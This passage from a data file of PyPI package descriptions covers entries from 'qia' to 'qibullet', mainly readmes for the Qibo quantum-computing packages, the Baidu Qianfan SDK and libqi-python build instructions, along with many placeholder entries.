The name of the preset may differ on\nyour machine. You may need to find the preset generated by Conan first by\ncalling:cmake --list-presetsHere, we\u2019ll assume that the preset is namedconan-linux-x86_64-gcc-debug.\nTo start building, you need to configure with CMake and then build:cmake --preset conan-linux-x86_64-gcc-debug\ncmake --build --preset conan-linux-x86_64-gcc-debugTests can now be invoked usingCTest, but they require a runtime environment\nfrom Conan so that all dependencies are found:source build/linux-x86_64-gcc-debug/generators/conanrun.sh\nctest --preset conan-linux-x86_64-gcc-debug --output-on-failure\nsource build/linux-x86_64-gcc-debug/generators/deactivate_conanrun.shFinally, you can install the project in the directory of your choice.The project defines a single install component, theModulecomponent.#`cmake--install`doesnotsupportpresetssadly.cmake \\\n --install build/linux-x86_64-gcc-debug \\\n --component Module --prefix ~/my-libqi-python-installWheel (PEP 517)You may build this project as a wheel package using PEP 517.It uses ascikit-buildbackend which interfaces with CMake.You may need to provide a toolchain file so that CMake finds the required\ndependencies, such as a toolchain generated by Conan:conan install . \\\n --build=missing `# Build dependencies binaries that are missing in Conan.` \\\n -c tools.build:skip_test=true # Skip any test.You now can use thebuildPython module to build the wheel using PEP 517.pip install -U build\npython -m build \\\n --config-setting cmake.define.CMAKE_TOOLCHAIN_FILE=$PWD/build/linux-x86_64-gcc-release/generators/conan_toolchain.cmakeWhen built that way, the native libraries present in the wheel are most likely incomplete.\nYou will need to useauditwheelordelocateto fix it.Noteauditwheelrequires thepatchelfutility program on Linux. You may need\nto install it (on Ubuntu:apt-get install patchelf).pip install -U auditwheel # or `delocate` on MacOS.\nauditwheel repair \\\n --strip `# Strip debugging symbols to get a lighter archive.` \\\n `# The desired platform, which may differ depending on your build host.` \\\n `# With Ubuntu 20.04, we can target manylinux_2_31. Newer versions of` \\\n `# Ubuntu will have to target newer versions of manylinux.` \\\n `# If you don't need a manylinux archive, you can also target the` \\\n `# 'linux_x86_64' platform.` \\\n --plat manylinux_2_31_x86_64 \\\n `# Path to the wheel archive.` \\\n dist/qi-*.whl#Thewheelwillbebydefaultplacedina`./wheelhouse/`directory.CrosscompilingThe project supports cross-compiling as explained in theCMake manual about\ntoolchains. You may simply set theCMAKE_TOOLCHAIN_FILEvariable to the\npath of the CMake file of your toolchain."} +{"package": "qia", "pacakge-description": "qiaAutomated testing tool for Web and Mobile with Python."} +{"package": "qian", "pacakge-description": "Quantitative Investment Algorithm Nexus (QIAN)\"Nexus\" is a term that refers to a connection, link, or central point of intersection. In the context of the acronym, it signifies the integration and interconnectedness of the various quantitative investment algorithms that Qian Capital runs. It represents the idea of algorithms coming together as a cohesive unit, forming a central hub or network, where they collaborate and interact to generate investment insights and drive decision-making. The term \"nexus\" conveys the notion of a powerful and dynamic network of algorithms working in synergy to analyze data, identify patterns, and optimize investment strategies. 
For Qian Capital, QIAN represents, and is the name of, our flagship super-intelligent AI trader that accounts for all of Qian Capital's quantitative investing algorithms, including all of the sub-models, inputs, etc. QIAN is the super-intelligent AGI that makes the final alpha generation, portfolio optimization, execution decisions."} +{"package": "qianfan", "pacakge-description": "\u767e\u5ea6\u5343\u5e06\u5927\u6a21\u578b\u5e73\u53f0 SDKDocumentation|GitHub|Cookbook\u9488\u5bf9\u767e\u5ea6\u667a\u80fd\u4e91\u5343\u5e06\u5927\u6a21\u578b\u5e73\u53f0\uff0c\u6211\u4eec\u63a8\u51fa\u4e86\u4e00\u5957 Python SDK\uff08\u4e0b\u79f0\u5343\u5e06 SDK\uff09\uff0c\u65b9\u4fbf\u7528\u6237\u901a\u8fc7\u4ee3\u7801\u63a5\u5165\u5e76\u8c03\u7528\u5343\u5e06\u5927\u6a21\u578b\u5e73\u53f0\u7684\u80fd\u529b\u3002\u5982\u4f55\u5b89\u88c5\u76ee\u524d\u5343\u5e06 SDK \u5df2\u53d1\u5e03\u5230 PyPI \uff0c\u7528\u6237\u53ef\u4f7f\u7528 pip \u547d\u4ee4\u8fdb\u884c\u5b89\u88c5\u3002\u5b89\u88c5\u5343\u5e06 SDK \u9700\u8981 3.7.0 \u6216\u66f4\u9ad8\u7684 Python \u7248\u672cpip install qianfan\u5728\u5b89\u88c5\u5b8c\u6210\u540e\uff0c\u7528\u6237\u5373\u53ef\u5728\u4ee3\u7801\u5185\u5f15\u5165\u5343\u5e06 SDK \u5e76\u4f7f\u7528importqianfan\u5feb\u901f\u4f7f\u7528\u5728\u4f7f\u7528\u5343\u5e06 SDK \u4e4b\u524d\uff0c\u7528\u6237\u9700\u8981\u767e\u5ea6\u667a\u80fd\u4e91\u63a7\u5236\u53f0 - \u5b89\u5168\u8ba4\u8bc1\u9875\u9762\u83b7\u53d6 Access Key \u4e0e Secret Key\uff0c\u5e76\u5728\u5343\u5e06\u63a7\u5236\u53f0\u4e2d\u521b\u5efa\u5e94\u7528\uff0c\u9009\u62e9\u9700\u8981\u542f\u7528\u7684\u670d\u52a1\uff0c\u5177\u4f53\u6d41\u7a0b\u53c2\u89c1\u5e73\u53f0\u8bf4\u660e\u6587\u6863\u3002\u5728\u83b7\u5f97\u4e86 Access Key \u4e0e Secret Key \u540e\uff0c\u7528\u6237\u5373\u53ef\u5f00\u59cb\u4f7f\u7528 SDK\uff1aimportosimportqianfanos.environ[\"QIANFAN_ACCESS_KEY\"]=\"...\"os.environ[\"QIANFAN_SECRET_KEY\"]=\"...\"chat_comp=qianfan.ChatCompletion(model=\"ERNIE-Bot\")resp=chat_comp.do(messages=[{\"role\":\"user\",\"content\":\"\u4f60\u597d\uff0c\u5343\u5e06\"}],top_p=0.8,temperature=0.9,penalty_score=1.0)print(resp[\"result\"])\u9664\u4e86\u901a\u8fc7\u73af\u5883\u53d8\u91cf\u8bbe\u7f6e\u5916\uff0c\u5343\u5e06 SDK \u8fd8\u63d0\u4f9b\u4e86.env\u6587\u4ef6\u548c\u901a\u8fc7\u4ee3\u7801\u914d\u7f6e\u7684\u65b9\u5f0f\uff0c\u8be6\u7ec6\u53c2\u89c1SDK \u914d\u7f6e\u90e8\u5206\u3002\u9664\u4e86\u6a21\u578b\u8c03\u7528\u5916\uff0c\u5343\u5e06 SDK \u8fd8\u63d0\u4f9b\u6a21\u578b\u8bad\u7ec3\u3001\u6570\u636e\u7ba1\u7406\u7b49\u8bf8\u591a\u529f\u80fd\uff0c\u5982\u4f55\u4f7f\u7528\u8bf7\u53c2\u8003SDK \u4f7f\u7528\u6587\u6863\u3002\u5176\u4ed6\u8ba4\u8bc1\u65b9\u5f0f\u8fd9\u91cc\u662f\u4e00\u4e9b\u5176\u4ed6\u8ba4\u8bc1\u65b9\u5f0f\uff0c\u8bf7\u4ec5\u5728\u65e0\u6cd5\u83b7\u53d6 Access Key \u4e0e Secret Key \u65f6\u4f7f\u7528\u3002\u8fd9\u4e9b\u8ba4\u8bc1\u65b9\u5f0f\u5df2\u7ecf\u8fc7\u65f6\uff0c\u5c06\u5728\u672a\u6765\u4ece SDK \u4e2d\u79fb\u9664\u3002API Key (AK) \u548c Secret Key (SK\uff09\u662f\u7528\u6237\u5728\u8c03\u7528\u5343\u5e06\u6a21\u578b\u76f8\u5173\u529f\u80fd\u65f6\u6240\u9700\u8981\u7684\u51ed\u8bc1\u3002\u5177\u4f53\u83b7\u53d6\u6d41\u7a0b\u53c2\u89c1\u5e73\u53f0\u7684\u5e94\u7528\u63a5\u5165\u4f7f\u7528\u8bf4\u660e\u6587\u6863\uff0c\u4f46\u8be5\u8ba4\u8bc1\u65b9\u5f0f\u65e0\u6cd5\u4f7f\u7528\u8bad\u7ec3\u3001\u53d1\u5e03\u6a21\u578b\u7b49\u529f\u80fd\uff0c\u82e5\u9700\u4f7f\u7528\u8bf7\u4f7f\u7528 Access Key \u548c Secret Key \u7684\u65b9\u5f0f\u8fdb\u884c\u8ba4\u8bc1\u3002\u5728\u83b7\u5f97\u5e76\u914d\u7f6e\u4e86 AK 
\u4ee5\u53ca SK \u540e\uff0c\u7528\u6237\u5373\u53ef\u5f00\u59cb\u4f7f\u7528 SDK\uff1aimportosimportqianfanos.environ[\"QIANFAN_AK\"]=\"...\"os.environ[\"QIANFAN_SK\"]=\"...\"chat_comp=qianfan.ChatCompletion(model=\"ERNIE-Bot\")resp=chat_comp.do(messages=[{\"role\":\"user\",\"content\":\"\u4f60\u597d\uff0c\u5343\u5e06\"}],top_p=0.8,temperature=0.9,penalty_score=1.0)print(resp[\"result\"])\u9002\u7528\u8303\u56f4\uff1a\u529f\u80fdAPI KeyAccess KeyChat \u5bf9\u8bdd\u2705\u2705Completion \u7eed\u5199\u2705\u2705Embedding \u5411\u91cf\u5316\u2705\u2705Plugin \u63d2\u4ef6\u8c03\u7528\u2705\u2705\u6587\u751f\u56fe\u2705\u2705\u5927\u6a21\u578b\u8c03\u4f18\u274c\u2705\u5927\u6a21\u578b\u7ba1\u7406\u274c\u2705\u5927\u6a21\u578b\u670d\u52a1\u274c\u2705\u6570\u636e\u96c6\u7ba1\u7406\u274c\u2705\u529f\u80fd\u5bfc\u89c8\u5343\u5e06\u5e73\u53f0\u63d0\u4f9b\u4e86\u5927\u6a21\u578b\u76f8\u5173\u7684\u8bf8\u591a\u80fd\u529b\uff0cSDK \u63d0\u4f9b\u4e86\u5bf9\u5404\u80fd\u529b\u7684\u8c03\u7528\uff0c\u5177\u4f53\u4ecb\u7ecd\u53ef\u4ee5\u67e5\u770bSDK \u6587\u6863\u6216\u8005GitHub \u4ed3\u5e93\u3002\u5927\u6a21\u578b\u80fd\u529b[Doc][GitHub]Chat \u5bf9\u8bddCompletion \u7eed\u5199Embedding \u5411\u91cf\u5316Plugin \u63d2\u4ef6\u8c03\u7528Text2Image \u6587\u751f\u56fe\u6a21\u578b\u8c03\u4f18[Doc][GitHub]\u6a21\u578b\u7ba1\u7406[Doc][GitHub]\u6a21\u578b\u670d\u52a1[Doc][GitHub]\u6570\u636e\u96c6\u7ba1\u7406[Doc][GitHub]Prompt \u7ba1\u7406[Doc][GitHub]\u5176\u4ed6Tokenizer [Doc][GitHub]\u63a5\u53e3\u6d41\u63a7 [Doc][GitHub]\u8fd8\u53ef\u4ee5\u901a\u8fc7API References\u67e5\u770b\u6bcf\u4e2a\u63a5\u53e3\u7684\u8be6\u7ec6\u8bf4\u660e\u3002\u8054\u7cfb\u6211\u4eec\u5982\u4f7f\u7528\u8fc7\u7a0b\u4e2d\u9047\u5230\u4ec0\u4e48\u95ee\u9898\uff0c\u6216\u5bf9SDK\u529f\u80fd\u6709\u5efa\u8bae\uff0c\u53ef\u901a\u8fc7\u5982\u4e0b\u65b9\u5f0f\u8054\u7cfb\u6211\u4eecGitHub issues\u767e\u5ea6\u667a\u80fd\u4e91\u5de5\u5355\uff08\u767e\u5ea6\u4e13\u5bb6\u5373\u65f6\u670d\u52a1\uff09LicenseApache-2.0"} +{"package": "qiang-distributions", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qianghua-evn", "pacakge-description": "No description available on PyPI."} +{"package": "qiangl", "pacakge-description": "Example PackageThis is a simple example package. 
You can useGithub-flavored Markdownto write your content."} +{"package": "qianglie", "pacakge-description": "\u5899\u88c2\u5730\u5740\u53d1\u5e03\u9875 \u00b7\u5899\u88c2\u6c38\u4e45\u57df\u540d\uff1ahttps://www.qianglie.com\u5173\u6ce8\u5899\u88c2\u63a8\u7279\uff1a@QiangLie\u6c38\u4e45\u57df\u540d\u88ab\u5927\u9646\u5730\u533a\u5c01\u9501\uff0c\u8bf7\u901a\u8fc7VPN\u6216\u4ee5\u4e0b\u65b9\u5f0f\u8bbf\u95ee\u5899\u88c2\u83b7\u53d6\u6700\u65b0\u57df\u540d\u53ef\u4ee5\u53d1\u9001\u90ae\u4ef6\u81f3qianglie@mail.com\u8bf7\u628a\u8fd9\u9875\u5185\u5bb9\u590d\u5236\u5230\u4f60\u7684\u8bb0\u4e8b\u672c\u4e0a\u6216\u59a5\u5584\u4fdd\u5b58\u5728\u5176\u4ed6\u5730\u65b9\u6bd4\u5982\u6709\u9053\u4e91\u7b14\u8bb0\uff0c\u4ee5\u514d\u627e\u4e0d\u5230\u6211\u4eec\uff01\u9632\u5c4f\u853d\u5730\u5740\uff1ahttps://cdn.qianglie.biz\u5907\u7528\u5730\u5740\uff08\u6bcf\u65e5\u66f4\u65b0\uff09\uff1ahttps://vk.com/qianglie\u5982\u679c\u56e0\u5404\u79cd\u539f\u56e0\uff0c\u4ee5\u4e0a\u65b9\u6cd5\u90fd\u4e0d\u884c\uff0c\u53ef\u4ee5\u53d1\u9001\u90ae\u4ef6\u5230 qianglie#vk.com # \u6362\u6210 @ \uff0c\u7d22\u53d6\u6700\u65b0\u5730\u5740\u3002"} +{"package": "qiankun", "pacakge-description": "No description available on PyPI."} +{"package": "qianqiucloudsdk", "pacakge-description": "No description available on PyPI."} +{"package": "qianqiuyun", "pacakge-description": "qianqiuyun python sdk"} +{"package": "qianxun-wechat-sdk", "pacakge-description": "\u5343\u5bfb\u5fae\u4fe1\u6846\u67b6\u7684 Python SDK\u4ecb\u7ecd\u5343\u5bfb\u5fae\u4fe1\u6846\u67b6\u7684 Python SDK\uff0c\u57fa\u4e8e\u5343\u5bfb\u5fae\u4fe1\u6846\u67b6\u7684 HTTP API \u63a5\u53e3\uff0c\u5c01\u88c5\u4e86\u4e00\u4e9b\u5e38\u7528\u7684\u63a5\u53e3\uff0c\u65b9\u4fbf\u5f00\u53d1\u8005\u4f7f\u7528\u3002\u5b89\u88c5pipinstallqianxun-wechat-sdk\u4f7f\u7528\u793a\u4f8bimportqianxun.EmojiasEmoji# \u5bfc\u5165 qianxun Emoji \u8868\u60c5\u6a21\u5757fromqianxun.SDKimportRobot# \u5bfc\u5165 qianxun SDK \u6846\u67b6# \u521b\u5efa\u4e00\u4e2a\u56de\u8c03\u51fd\u6570\u6765\u63a5\u6536 qianxun \u6846\u67b6\u7684\u56de\u8c03\u4e8b\u4ef6defcallback(request):print('='*50+'\u56de\u8c03\u4e8b\u4ef6'+'='*50,end='\\n\\n')print(request)ifrequest['event']==10014:print('\u8d26\u53f7\u53d8\u52a8\u4e8b\u4ef6(10014)')ifrequest['event']==10008:print('\u6536\u5230\u7fa4\u804a\u6d88\u606f(10008)')ifrequest['event']==10009:print('\u6536\u5230\u79c1\u804a\u6d88\u606f(10009)')ifrequest['event']==10010:print('\u81ea\u5df1\u53d1\u51fa\u6d88\u606f(10010)')ifrequest['event']==10006:print('\u6536\u5230\u8f6c\u8d26\u4e8b\u4ef6(10006)')ifrequest['event']==10013:print('\u64a4\u56de\u4e8b\u4ef6(10013)')ifrequest['event']==10011:print('\u597d\u53cb\u8bf7\u6c42(10011)')ifrequest['event']==10007:print('\u652f\u4ed8\u4e8b\u4ef6(10007)')if__name__=='__main__':# \u521b\u5efa\u4e00\u4e2a\u673a\u5668\u4eba\u5b9e\u4f8b\uff0c\u4f20\u5165\u673a\u5668\u4eba\u7684 ip \u548c\u7aef\u53e3\uff0c\u4ee5\u53ca\u673a\u5668\u4eba\u7684 wxid (\u53ef\u9009)robot=Robot(host='127.0.0.1',port=7777,bot_wxid='')# \u8c03\u7528\u673a\u5668\u4eba\u7684\u767b\u5f55\u63a5\u53e3, \u83b7\u53d6\u673a\u5668\u4eba\u7684 wxidrobot.bot_wxid=robot.getWeChatList()['result'][0]['wxid']# \u521b\u5efa\u4e00\u4e2a\u673a\u5668\u4eba\u7684\u56de\u8c03\u4e8b\u4ef6\uff0c\u4f20\u5165\u56de\u8c03\u51fd\u6570\u548c\u7aef\u53e3robot.callbackEvents(callback_fun=callback,port=5000)# \u8c03\u7528\u673a\u5668\u4eba\u7684\u53d1\u9001\u6587\u672c\u6d88\u606f\u63a5\u53e3\uff0c\u4f20\u5165\u673a\u5668\u4eba\u7684 wxid 
\u548c\u6d88\u606f\u5185\u5bb9robot.sendTextMessage(wxid='filehelper',msg=f'\u4f60\u597d{Emoji.\u5c0f\u4e11\u8138}\u6d4b\u8bd5{Emoji.\u8868\u60c5_\u6342\u8138}')"} +{"package": "qianyan", "pacakge-description": "No description available on PyPI."} +{"package": "qianyan-test", "pacakge-description": "No description available on PyPI."} +{"package": "qianyantest1", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qianyan-test1", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qianyantest2", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qianyan-test4", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qianyantest5", "pacakge-description": "No description available on PyPI."} +{"package": "qianyan-test5", "pacakge-description": "No description available on PyPI."} +{"package": "qianyantest6", "pacakge-description": "No description available on PyPI."} +{"package": "qianyantest7", "pacakge-description": "No description available on PyPI."} +{"package": "qianyantest8", "pacakge-description": "No description available on PyPI."} +{"package": "qiaotest2022", "pacakge-description": "No description available on PyPI."} +{"package": "qib", "pacakge-description": "Python package for quantum circuits and algorithms.InstallationTo install qib, clone or download theonline repositoryand install it in development mode viapython3-mpipinstall-eDocumentationSource code documentation is available atqib.readthedocs.io."} +{"package": "qibo", "pacakge-description": "Qibo is an open-source full stack API for quantum simulation and quantum hardware control.Some of the key features of Qibo are:Definition of a standard language for the construction and execution of quantum circuits with device agnostic approach to simulation and quantum hardware control based on plug and play backend drivers.A continuously growing code-base of quantum algorithms applications presented with examples and tutorials.Efficient simulation backends with GPU, multi-GPU and CPU with multi-threading support.Simple mechanism for the implementation of new simulation and hardware backend drivers.DocumentationQibo documentation is availablehere.Minimum Working ExamplesA simpleQuantum Fourier Transform (QFT)example to test your installation:fromqibo.modelsimportQFT# Create a QFT circuit with 15 qubitscircuit=QFT(15)# Simulate final state wavefunction default initial state is |00>final_state=circuit()Here another example with more gates and shots simulation:importnumpyasnpfromqiboimportCircuit,gatesc=Circuit(2)c.add(gates.X(0))# Add a measurement register on both qubitsc.add(gates.M(0,1))# Execute the circuit with the default initial state |00>.result=c(nshots=100)In both cases, the simulation will run in a single device CPU or GPU in double precisioncomplex128.Citation policyIf you use the package please refer tothe documentationfor citation instructions.ContactsTo get in touch with the community and the developers, consider joining the Qibo workspace on Matrix:https://matrix.to/#/#qibo:matrix.orgSupporters and collaboratorsQuantum Research Center, Technology Innovation Institute (TII), United Arab EmiratesUniversit\u00e0 degli Studi di Milano (UNIMI), Italy.Istituto Nazionale di Fisica Nucleare (INFN), Italy.Universit\u00e0 degli Studi di Milano-Bicocca (UNIMIB), Italy.European Organization for Nuclear research (CERN), Switzerland.Universitat de Barcelona (UB), Spain.Barcelona 
Supercomputing Center (BSC), Spain. Qilimanjaro Quantum Tech, Spain. Centre for Quantum Technologies (CQT), Singapore. Institute of High Performance Computing (IHPC), Singapore. National Supercomputing Centre (NSCC), Singapore. RIKEN Center for Computational Science (R-CCS), Japan. NVIDIA (cuQuantum), USA."} +{"package": "qibocal", "pacakge-description": "Qibocal: Qibocal provides Quantum Characterization Validation and Verification protocols using Qibo and Qibolab. Qibocal key features: automatization of calibration protocols; declarative inputs using a runcard; generation of a report. Documentation: Qibocal documentation is available here. Installation: the package can be installed from source: git clone https://github.com/qiboteam/qibocal.git; cd qibocal; pip install . Developer instructions: for development, make sure to install the package using poetry and to install the pre-commit hooks: git clone https://github.com/qiboteam/qibocal.git; cd qibocal; poetry install; pre-commit install. Minimal working example: this section shows the steps to perform a resonator spectroscopy with Qibocal. Write a runcard: a runcard contains all the essential information to run a specific task. For our purposes, we can use the following: platform: tii1q\n\nqubits: [0]\n\n- id: resonator spectroscopy high power\n priority: 0\n operation: resonator_spectroscopy\n parameters:\n freq_width: 10_000_000\n freq_step: 500_000\n amplitude: 0.4\n power_level: high\n nshots: 1024\n relaxation_time: 0\nHow to run protocols: to run the protocols specified in the runcard, Qibocal uses the qq auto command. If -o is specified, the results will be saved in it; otherwise qq will automatically create a default folder containing the current date and the username. Uploading reports to server: in order to upload the report to a centralized server, send your public ssh key to the server administrators (from the machine(s) you are planning to upload the report from) and then use the qq upload command.
This program will upload your report to the server and generate an unique URL.ContributingContributions, issues and feature requests are welcome!\nFeel free to checkCitation policyIf you use the package please refer tothe documentationfor citation instructions"} +{"package": "qibochem", "pacakge-description": "QibochemQibochem is a plugin toQibofor quantum chemistry simulations.Some of the features of Qibochem are:General purposeMoleculeclassPySCF for calculating the molecular 1- and 2-electron integralsUser defined orbital active spaceUnitary Coupled Cluster AnsatzVarious Qibo backends (numpy, JIT, TN) for efficient simulationDocumentationThe Qibochem documentation can be foundhereMinimum working example:An example of building the UCCD ansatz with a H2 moleculeimport numpy as np\nfrom qibo.models import VQE\n\nfrom qibochem.driver.molecule import Molecule\nfrom qibochem.ansatz.hf_reference import hf_circuit\nfrom qibochem.ansatz.ucc import ucc_circuit\n\n# Define the H2 molecule and obtain its 1-/2- electron integrals with PySCF\nh2 = Molecule([('H', (0.0, 0.0, 0.0)), ('H', (0.0, 0.0, 0.7))])\nh2.run_pyscf()\n# Generate the molecular Hamiltonian\nhamiltonian = h2.hamiltonian()\n\n# Build a UCC circuit ansatz for running VQE\ncircuit = hf_circuit(h2.nso, sum(h2.nelec))\ncircuit += ucc_circuit(h2.nso, [0, 1, 2, 3])\n\n# Create and run the VQE, starting with random initial parameters\nvqe = VQE(circuit, hamiltonian)\n\ninitial_parameters = np.random.uniform(0.0, 2*np.pi, 8)\nbest, params, extra = vqe.minimize(initial_parameters)Citation policyIf you use the Qibochem plugin please refer to the documentation for citation instructions.ContactFor questions, comments and suggestions please contact us athttps://matrix.to/#/#qibo:matrix.orgContributingContributions, issues and feature requests are welcome."} +{"package": "qibo-client", "pacakge-description": "Qibo clientThe documentation of the project can be foundhere.InstallInstall first the package dependencies with the following commands.We recommend to start with a fresh virtual environment to avoid dependencies\nconflicts with previously installed packages.python-mvenv./envsourceactivate./env/bin/activateTheqibo-clientpackage can be installed throughpip:pipinstallqibo-clientQuick startOnce installed, the provider allows to run quantum circuit computations on the\nTiiQ remote server.:warning: Note: to run jobs on the remote cluster it is mandatory to own a\nvalidated account.\nPlease, sign up tothis linkto\nobtain the needed token to run computations on the cluster.The following snippet provides a basic usage example.\nReplace theyour-tii-qrc-tokenstring with your user token received during the\nregistration process.importqiboimportqibo_client# create the circuit you want to runcircuit=qibo.models.QFT(5)# authenticate to server through the client instancetoken=\"your-tii-qrc-token\"client=qibo_client.TII(token)# run the circuitresult=client.run_circuit(circuit,nshots=1000,dev=\"sim\")"} +{"package": "qiboconnection", "pacakge-description": "QiboconnectionPython library that allows you to execute quantum programs on Qilimanjaro's QPUs and simulators.ContributionsThank you for your interest in our project. While we appreciate your enthusiasm and interest in contributing, we would like to clarify our policy regarding external contributions.Our Contribution PolicyThis project is primarily intended for reference purposes, and we do not actively accept or manage external contributions, including pull requests and issue reports. 
Our development team maintains this codebase for internal use and does not have the capacity to review or merge contributions from the community.Why We Have This PolicyOur decision to limit external contributions is based on our specific project goals, resource constraints, and internal policies. While we understand the value of collaboration and open-source contributions, we have chosen to maintain this project as a reference rather than a collaborative, community-driven effort.Seeking Help and SupportIf you have questions about using this project or encounter issues, please feel free to open an issue in the repository for discussion. However, please be aware that our ability to provide support or address issues may be limited.Thank you for your understanding and for considering our project. We hope that you find it useful for your needs, and we wish you the best in your open-source endeavors.Sincerely,Qilimanjaro Quantum Tech"} +{"package": "qibojit", "pacakge-description": "qibojitThis package provides acceleration features forQibosimulations using just-in-time (JIT) custom kernel withnumba,cupyandcuQuantum.DocumentationThe qibojit backend documentation is available atqibo.science.Citation policyIf you use the package please refer tothe documentationfor citation instructions."} +{"package": "qibolab", "pacakge-description": "QibolabQibolab is the dedicatedQibobackend for\nthe automatic deployment of quantum circuits on quantum hardware.Some of the key features of Qibolab are:Deploy Qibo models on quantum hardware easily.Create custom experimental drivers for custom lab setup.Support multiple heterogeneous platforms.Use existing calibration procedures for experimentalists.DocumentationThe qibolab backend documentation is available athttps://qibo.science/qibolab/stable/.Minimum working exampleA simple example on how to connect to a platform and use it execute a pulse sequence:fromqibolabimportcreate_platform,ExecutionParametersfromqibolab.pulsesimportDrivePulse,ReadoutPulse,PulseSequence# Define PulseSequencesequence=PulseSequence()# Add some pulses to the pulse sequencesequence.add(DrivePulse(start=0,amplitude=0.3,duration=4000,frequency=200_000_000,relative_phase=0,shape=\"Gaussian(5)\",# Gaussian shape with std = duration / 5channel=1,))sequence.add(ReadoutPulse(start=4004,amplitude=0.9,duration=2000,frequency=20_000_000,relative_phase=0,shape=\"Rectangular\",channel=2,))# Define platform and load specific runcardplatform=create_platform(\"my_platform\")# Connects to lab instruments using the details specified in the calibration settings.platform.connect()# Execute a pulse sequenceoptions=ExecutionParameters(nshots=1000)results=platform.execute_pulse_sequence(sequence,options)# Print the acquired shotsprint(results.samples)# Disconnect from the instrumentsplatform.disconnect()Here is another example on how to execute circuits:importqibofromqiboimportgates,models# Create circuit and add gatesc=models.Circuit(1)c.add(gates.H(0))c.add(gates.RX(0,theta=0.2))c.add(gates.X(0))c.add(gates.M(0))# Simulate the circuit using numpyqibo.set_backend(\"numpy\")for_inrange(5):result=c(nshots=1024)print(result.probabilities())# Execute the circuit on hardwareqibo.set_backend(\"qibolab\",platform=\"my_platform\")for_inrange(5):result=c(nshots=1024)print(result.probabilities())Citation policyIf you use the package please refer tothe documentationfor citation instructions."} +{"package": "qibosoq", "pacakge-description": "QibosoqRepository for developing server side of RFSoC fpga boards\nQibosoq is a 
server for integrating Qick in the Qibolab ecosystem for executing arbitrary pulse sequences on QPUs. The complete documentation can be found at qibo.science/qibosoq/stable and qibo.science/qibosoq/latest. Installation: please refer to the documentation for installation instructions. Configuration parameters: in configuration.py some default qibosoq parameters are hardcoded. They can be changed using environment variables (see documentation): IP of the server, port of the server, paths of log files, name of python loggers, path of bitstream, type of readout (multiplexed or not, depending on the loaded bitstream). Run the server: the simplest way of executing the server is sudo -E python -m qibosoq, and the server can be closed with Ctrl-C. Note that with this command the script will close as soon as the terminal where it is running is closed. To run the server in detached mode you can use nohup sudo -E python -m qibosoq &, and the server can be closed with sudo kill (the PID will be saved in the log). TII boards: with TII boards the server can also be executed using the alias server-run-bkg. Also, two additional commands are added in .bashrc: serverinfo and serverclose. serverinfo will print the PID if the server is running, otherwise it will print \"No running server\". serverclose will close the server, if it is running. All these commands require sudo privileges. Contributing: contributions, issues and feature requests are welcome! Feel free to check"} +{"package": "qibotf", "pacakge-description": "qibotf: this package provides acceleration features for Qibo using TensorFlow custom operators. Documentation: the qibotf backend documentation is available at qibo.readthedocs.io. Support and requirements: here is a compatibility matrix for the qibotf versions (columns: qibotf, ref. qibo, tensorflow, OS Hardware, CUDA):
0.0.6 | >=0.1.7 | 2.8.0 for pip (>=2.2 for source) | linux cpu/gpu, mac cpu(pip)/gpu(source) | 11.2
0.0.5 | >=0.1.7 | 2.7.1 for pip (>=2.2 for source) | linux cpu/gpu, mac cpu(pip)/gpu(source) | 11.2
0.0.4 | >=0.1.7 | 2.7.0 for pip (>=2.2 for source) | linux cpu/gpu, mac cpu(pip)/gpu(source) | 11.2
0.0.3 | 0.1.6 | 2.6.0 for pip (>=2.2 for source) | linux cpu/gpu, mac cpu(pip)/gpu(source) | 11.2
0.0.2 | 0.1.6 | 2.5.0 for pip (>=2.2 for source) | linux cpu/gpu, mac cpu(pip)/gpu(source) | 11.2
0.0.1 | 0.1.6 | 2.4.1 for pip (>=2.2 for source) | linux cpu/gpu, mac cpu(pip)/gpu(source) | 11.0
Citation policy: if you use the package please cite the following references: https://arxiv.org/abs/2009.01845 and https://doi.org/10.5281/zenodo.3997194"} +{"package": "qibuild", "pacakge-description": "No description available on PyPI."} +{"package": "qibullet", "pacakge-description": "qiBullet: Bullet-based python simulation for SoftBank Robotics' robots. Installation: the following modules are required: numpy, pybullet. The qiBullet module can be installed via pip, for python 2.7 and python 3: pip install --user qibullet. Additional resources (robot meshes and URDFs) are required in order to be able to spawn a Pepper, NAO or Romeo robot in the simulation. These extra resources will be installed in your home folder: /home/username/.qibullet on Linux and macOS, C:\\Users\\username\\.qibullet on Windows. The installation of the additional resources will automatically be triggered if you try to spawn a Pepper, NAO or Romeo for the first time. If qiBullet finds the additional resources in your local folder, the installation won't be triggered. The robot meshes are under a specific license, you will need to agree to that license in order to install them. More details on the installation process can be found on the wiki. Usage: a robot can be spawned via the SimulationManager class:
import sys
from qibullet import SimulationManager

if __name__ == \"__main__\":
    simulation_manager = SimulationManager()

    # Launch a simulation instance, using a graphical interface.
    # Please note that only one graphical interface can be launched at a time
    client_id = simulation_manager.launchSimulation(gui=True)

    # Selection of the robot type to spawn (True : Pepper, False : NAO)
    pepper_robot = True

    if pepper_robot:
        # Spawning a virtual Pepper robot, at the origin of the WORLD frame, and a ground plane
        pepper = simulation_manager.spawnPepper(
            client_id,
            translation=[0, 0, 0],
            quaternion=[0, 0, 0, 1],
            spawn_ground_plane=True)
    else:
        # Or a NAO robot, at a default position
        nao = simulation_manager.spawnNao(
            client_id,
            spawn_ground_plane=True)

    # This snippet is a blocking call, just to keep the simulation opened
    if sys.version_info[0] >= 3:
        input(\"Press a key to end the simulation\")
    else:
        raw_input(\"Press a key to end the simulation\")

    # Stop the simulation
    simulation_manager.stopSimulation(client_id)
Or using loadRobot from the PepperVirtual class if you already have a simulated environment:
pepper = PepperVirtual()
pepper.loadRobot(
    translation=[0, 0, 0],
    quaternion=[0, 0, 0, 1],
    physicsClientId=client_id)
More snippets can be found in the examples folder, or on the wiki; a small motion-control sketch is also given below.
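As a small illustration of how a spawned robot can then be driven, here is a hedged sketch built on the motion methods exposed by the virtual robot classes (setAngles, getAnglesPosition, goToPosture); the joint name, posture name and speed fractions are illustrative values, not taken from this README:
import time
from qibullet import SimulationManager

# Spawn a virtual Pepper in a headless simulation, as in the snippet above
simulation_manager = SimulationManager()
client_id = simulation_manager.launchSimulation(gui=False)
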